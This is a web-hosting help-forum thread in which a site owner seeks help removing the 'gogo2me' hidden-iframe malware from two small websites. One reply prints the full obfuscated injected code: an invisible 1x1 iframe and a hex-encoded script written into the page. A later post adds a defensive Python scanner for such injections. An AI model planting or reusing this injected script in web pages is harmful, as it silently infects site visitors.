Detect badware on my website
I was wondering if someone could help me with my problem. I received an email to say that my websites www.rockliffehouse.co.uk and www.johnhillequestriantraining.co.uk had malware. Someone very kindly suggested which code it was and I have removed it from all of the pages. I have requested a review and it has been denied, saying it still has malware (Malicious software is hosted on 2 domain(s), including 94.247.2.0/, gogo2me.net/).
I have checked the websites on www.unmaskparasites.com and it says they are clean. Could anyone have a look and see if they can see something I have missed?
They are small websites, only 5 pages each:
www.rockliffehouse.co.uk/Bookings.html
www.rockliffehouse.co.uk/attractions.html
www.rockliffehouse.co.uk/accommodation.html
www.rockliffehouse.co.uk/contact.html
www.rockliffehouse.co.uk/index.html
www.johnhillequestriantraining.co.uk/index.html
www.johnhillequestriantraining.co.uk/contact.html
www.johnhillequestriantraining.co.uk/photos.html
www.johnhillequestriantraining.co.uk/trainingdays.html
www.johnhillequestriantraining.co.uk/aboutjohn.html
Thank you very, very much in advance.
Hi,
When I check both www.rockliffehouse.co.uk/index.html and www.johnhillequestriantraining.co.uk/index.html with Unmask Parasites the hidden IFrame is still detected. And when I check the HTML code I can still see the same malicious scripts.
Your pages either got reinfected or you failed to remove the malicious code.
Did you check your computer for spyware and trojans? Did you change the passwords?
You might also need to contact your hosting provider.
Denis
http://www.UnmaskParasites.com
Hi Denis
I have removed all of the iframes and I just checked again and it does not appear to be back.
www.UnmaskParasites.com had them both marked as clean all yesterday. Today when I try to check it is not doing anything, not giving me any result.
I ran AVG and Malwarebytes and they have found nothing on my computer.
Can you advise something else I should run?
Thanks,
Rachael
Rachael,
What do you mean by Unmask Parasites not giving you any result? It is in beta stage and I’m interested in hearing about any issues.
I just checked once more:
http://www.unmaskparasites.com/security-report/?page=www.johnhillequestriantraining.co.uk/index.html
http://www.unmaskparasites.com/security-report/?page=www.rockliffehouse.co.uk
The hidden iframe is still detected.
Unfortunately, I’m not a specialist in antivirus tools so I can’t advise anything. I just know that if you are on Windows and loaded your own sites recently in Internet Explorer with enabled JavaScript, the chances are you are infected.
I’ve just published a blog post about this gogo2me exploit. You might want to read it.
http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/
Denis
http://www.UnmaskParasites.com
Hi Rachael,
I checked www.rockliffehouse.co.uk, and on index.html I found the following suspicious code. I believe this is what is causing the problem. If you remove all of this code, you should no longer be flagged. Note that there are some extra slashes below, because I did a "cut and paste" into this form. Let me know if you have any more questions. It appears to be the same problem on www.johnhillequestriantraining.co.uk.
<iframe src=‘http://url/’ width=‘1’ height=‘1’ style=‘visibility: hi\
dden;’></iframe><script>function c102916999516l496db8026a0dc(l496db8026a4c3){ var l496db8026\
a8ab=16; return (parseInt(l496db8026a4c3,l496db8026a8ab));}function l496db8026b07d(l496db802\
6b464){ var l496db8026c92e=2; var l496db8026b84d=‘’;l496db8026cfbe=String.fromCharCode;for(l\
496db8026bc36=0;l496db8026bc36<l496db8026b464.length;l496db8026bc36+=l496db8026c92e){ l496db\
8026b84d+=(l496db8026cfbe(c102916999516l496db8026a0dc(l496db8026b464.substr(l496db8026bc36,l\
496db8026c92e))));}return l496db8026b84d;} var x80=’‘;var l496db8026d3a7=’3C736’+x80+’3726’+\
x80+’970743E6’+x80+’96’+x80+’6’+x80+’28216’+x80+’D796’+x80+’96’+x80+’1297B6’+x80+’46’+x80+’F\
6’+x80+’3756’+x80+’D6’+x80+’56’+x80+’E742E77726’+x80+’9746’+x80+’528756’+x80+’E6’+x80+’5736’\
+x80+’36’+x80+’1706’+x80+’528202725336’+x80+’32536’+x80+’392536’+x80+’36’+x80+’2537322536’+x\
80+’312536’+x80+’6’+x80+’42536’+x80+’352532302536’+x80+’6’+x80+’52536’+x80+’312536’+x80+’6’+\
x80+’42536’+x80+’3525336’+x80+’42536’+x80+’332533312533302532302537332537322536’+x80+’332533\
6’+x80+’42532372536’+x80+’3825373425373425373025336’+x80+’125326’+x80+’6’+x80+’25326’+x80+’6\
’+x80+’2536’+x80+’372536’+x80+’6’+x80+’6’+x80+’2536’+x80+’372536’+x80+’6’+x80+’6’+x80+’25333\
22536’+x80+’6’+x80+’42536’+x80+’3525326’+x80+’52536’+x80+’6’+x80+’52536’+x80+’3525373425326’\
+x80+’6’+x80+’25326’+x80+’52536’+x80+’372536’+x80+’6’+x80+’6’+x80+’25326’+x80+’6’+x80+’2536’\
+x80+’332536’+x80+’382536’+x80+’352536’+x80+’332536’+x80+’6’+x80+’225326’+x80+’52536’+x80+’3\
82537342536’+x80+’6’+x80+’42536’+x80+’6’+x80+’32532372532302537372536’+x80+’392536’+x80+’342\
537342536’+x80+’3825336’+x80+’4253331253336’+x80+’253336’+x80+’2532302536’+x80+’382536’+x80+\
’352536’+x80+’392536’+x80+’372536’+x80+’3825373425336’+x80+’4253331253338253336’+x80+’253230\
2537332537342537392536’+x80+’6’+x80+’32536’+x80+’3525336’+x80+’4253237253736’+x80+’2536’+x80\
+’392537332536’+x80+’392536’+x80+’322536’+x80+’392536’+x80+’6’+x80+’32536’+x80+’392537342537\
3925336’+x80+’12536’+x80+’382536’+x80+’392536’+x80+’342536’+x80+’342536’+x80+’352536’+x80+’6\
’+x80+’525323725336’+x80+’525336’+x80+’325326’+x80+’6’+x80+’2536’+x80+’392536’+x80+’36’+x80+\
’2537322536’+x80+’312536’+x80+’6’+x80+’42536’+x80+’3525336’+x80+’52729293B7D76’+x80+’6’+x80+\
’172206’+x80+’D796’+x80+’96’+x80+’13D7472756’+x80+’53B3C2F736’+x80+’3726’+x80+’970743E’;docu\
ment.write(l496db8026b07d(l496db8026d3a7));</script>
Here is the malicious code on www.johnhillequestriantraining.co.uk:
<iframe src=‘http://url/’ width=‘1’ height=‘1’ style=‘visibility: hidden;’></iframe><\
script>function c102916999516l496db4557465a(l496db45574a3f){ var l496db45574e37=16; return (\
parseInt(l496db45574a3f,l496db45574e37));}function l496db455755f9(l496db455759e1){ var l496\
db45575dcd=‘’;l496db45576d6b=String.fromCharCode;for(l496db455761b1=0;l496db455761b1<l496db4\
55759e1.length;l496db455761b1+=2){ l496db45575dcd+=(l496db45576d6b(c102916999516l496db455746\
5a(l496db455759e1.substr(l496db455761b1,2))));}return l496db45575dcd;} var x45=’‘;var l496db\
45577152=’3C736’+x45+’3726’+x45+’970743E6’+x45+’96’+x45+’6’+x45+’28216’+x45+’D796’+x45+’96’+\
x45+’1297B6’+x45+’46’+x45+’F6’+x45+’3756’+x45+’D6’+x45+’56’+x45+’E742E77726’+x45+’9746’+x45+\
’528756’+x45+’E6’+x45+’5736’+x45+’36’+x45+’1706’+x45+’528202725336’+x45+’32536’+x45+’392536’\
+x45+’36’+x45+’2537322536’+x45+’312536’+x45+’6’+x45+’42536’+x45+’352532302536’+x45+’6’+x45+’\
52536’+x45+’312536’+x45+’6’+x45+’42536’+x45+’3525336’+x45+’42536’+x45+’332533312533302532302\
537332537322536’+x45+’3325336’+x45+’42532372536’+x45+’3825373425373425373025336’+x45+’125326\
’+x45+’6’+x45+’25326’+x45+’6’+x45+’2536’+x45+’372536’+x45+’6’+x45+’6’+x45+’2536’+x45+’372536\
’+x45+’6’+x45+’6’+x45+’2533322536’+x45+’6’+x45+’42536’+x45+’3525326’+x45+’52536’+x45+’6’+x45\
+’52536’+x45+’3525373425326’+x45+’6’+x45+’25326’+x45+’52536’+x45+’372536’+x45+’6’+x45+’6’+x4\
5+’25326’+x45+’6’+x45+’2536’+x45+’332536’+x45+’382536’+x45+’352536’+x45+’332536’+x45+’6’+x45\
+’225326’+x45+’52536’+x45+’382537342536’+x45+’6’+x45+’42536’+x45+’6’+x45+’325323725323025373\
72536’+x45+’392536’+x45+’342537342536’+x45+’3825336’+x45+’4253336’+x45+’25333125333525323025\
36’+x45+’382536’+x45+’352536’+x45+’392536’+x45+’372536’+x45+’3825373425336’+x45+’42533352533\
322532302537332537342537392536’+x45+’6’+x45+’32536’+x45+’3525336’+x45+’4253237253736’+x45+’2\
536’+x45+’392537332536’+x45+’392536’+x45+’322536’+x45+’392536’+x45+’6’+x45+’32536’+x45+’3925\
373425373925336’+x45+’12536’+x45+’382536’+x45+’392536’+x45+’342536’+x45+’342536’+x45+’352536\
’+x45+’6’+x45+’525323725336’+x45+’525336’+x45+’325326’+x45+’6’+x45+’2536’+x45+’392536’+x45+’\
36’+x45+’2537322536’+x45+’312536’+x45+’6’+x45+’42536’+x45+’3525336’+x45+’52729293B7D76’+x45+\
’6’+x45+’172206’+x45+’D796’+x45+’96’+x45+’13D7472756’+x45+’53B3C2F736’+x45+’3726’+x45+’97074\
3E’;document.write(l496db455755f9(l496db45577152));</script>
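The two snippets above share one shape: a 1x1 iframe styled invisible, followed by a script that hex-decodes a long string (split up with an empty variable such as x80 to defeat simple pattern matching) and passes the result to document.write(). Below is an added example, written for this thread and not code from any of the posters or from Unmask Parasites, that checks local copies of HTML pages for exactly those signs. It parses the hex chains offline, without running any JavaScript, so you can read what would have been written into the page. The sample page, the decoded marker string and the attacker.invalid address are constructed for the example; the file names in the usage comment are assumed to be local downloads of your pages.

```python
import re
import sys

# --- Constructed sample input (not the injected code posted in this thread) ---
# Stand-in for what the hex string decodes to; the real one wrote a further iframe.
INJECTED_PAYLOAD = "<script>document.write('<b>decoded payload marker</b>')</script>"

def _hex_with_splits(text, chunk=5, filler="'+x80+'"):
    """Hex-encode text the way the injection did: uppercase hex pairs with an
    empty variable (x80 = '') concatenated in every few characters."""
    hexed = text.encode("latin-1").hex().upper()
    return filler.join(hexed[i:i + chunk] for i in range(0, len(hexed), chunk))

SAMPLE_INFECTED = (
    "<html><body><h1>Welcome</h1>"
    "<iframe src='http://attacker.invalid/' width='1' height='1' "
    "style='visibility: hidden;'></iframe>"
    "<script>function h(s){return parseInt(s,16);}"
    "function d(s){var o='';for(i=0;i<s.length;i+=2){"
    "o+=String.fromCharCode(h(s.substr(i,2)));}return o;}"
    " var x80='';var p='" + _hex_with_splits(INJECTED_PAYLOAD) + "';"
    "document.write(d(p));</script></body></html>"
)
SAMPLE_CLEAN = "<html><body><h1>Welcome</h1><p>Bookings: call us.</p></body></html>"

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""")
# A chain of hex string literals joined by "+ident+" (e.g. '3C73'+x80+'6372'),
# as assigned with "= ... ;" in the injected script.
HEXCHAIN_RE = re.compile(
    r"=\s*('[0-9A-Fa-f]*'(?:\s*\+\s*\w+\s*\+\s*'[0-9A-Fa-f]*')*)\s*;")
SIGNATURES = [
    ("String.fromCharCode", re.compile(r"String\.fromCharCode")),
    ("parseInt", re.compile(r"parseInt\s*\(")),
    ("document.write", re.compile(r"document\.write\s*\(")),
]

def hidden_iframes(html):
    """Return src values of iframes that are 0/1 pixel or styled invisible."""
    found = []
    for m in IFRAME_RE.finditer(html):
        attrs = {}
        for a in ATTR_RE.finditer(m.group(1)):
            attrs[a.group(1).lower()] = next(v for v in a.groups()[1:] if v is not None)
        tiny = attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1")
        style = "".join(attrs.get("style", "").split()).lower()
        invisible = "visibility:hidden" in style or "display:none" in style
        if tiny or invisible:
            found.append(attrs.get("src", ""))
    return found

def decoder_signatures(html):
    """Names of the decoder building blocks present in the page."""
    return [name for name, rx in SIGNATURES if rx.search(html)]

def decode_hex_chains(html):
    """Decode hex literal chains offline (no JavaScript is executed) so you can
    read what document.write() would have inserted."""
    decoded = []
    for m in HEXCHAIN_RE.finditer(html):
        digits = "".join(re.findall(r"'([0-9A-Fa-f]*)'", m.group(1)))
        if len(digits) < 8 or len(digits) % 2:
            continue  # empty or odd-length strings are not encoded payloads
        decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded

def scan(html):
    return {
        "hidden_iframes": hidden_iframes(html),
        "decoder_signatures": decoder_signatures(html),
        "decoded_strings": decode_hex_chains(html),
    }

def is_suspicious(report):
    """Hidden iframe, or the decode-then-write combination, is enough to flag."""
    sigs = set(report["decoder_signatures"])
    return bool(report["hidden_iframes"]) or (
        {"String.fromCharCode", "document.write"} <= sigs)

if __name__ == "__main__":
    # Usage: python scan_pages.py Bookings.html attractions.html ...  (local copies)
    paths = sys.argv[1:]
    for path in paths:
        with open(path, encoding="latin-1") as fh:
            report = scan(fh.read())
        print(path, "SUSPICIOUS" if is_suspicious(report) else "clean", report)
    if not paths:
        print("sample infected:", scan(SAMPLE_INFECTED))
        print("sample clean:", scan(SAMPLE_CLEAN))
```

Run it against a fresh download of each page rather than the copy on your PC, since the question in this thread is whether the files on the server were really cleaned or have been reinfected; a page that comes back clean from this check but is still flagged by the scanner is worth comparing byte for byte with the last known-good upload.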
Thank you all for your help; I have hopefully got on top of this. I have removed all bad coding and the Google review says that www.johnhillequestriantraining.co.uk is now clean (the warning has not been removed though; does anyone know how long this takes?).
I have requested a review for www.rockliffehouse.co.uk and am waiting for the results.
Unmask Parasites was not giving me any results when using my BT/Yahoo browser: when I clicked check it just reloaded the same page again with no result on it, but when I did it in Internet Explorer it worked fine and said all pages were clean.
Thanks again everyone,
Rach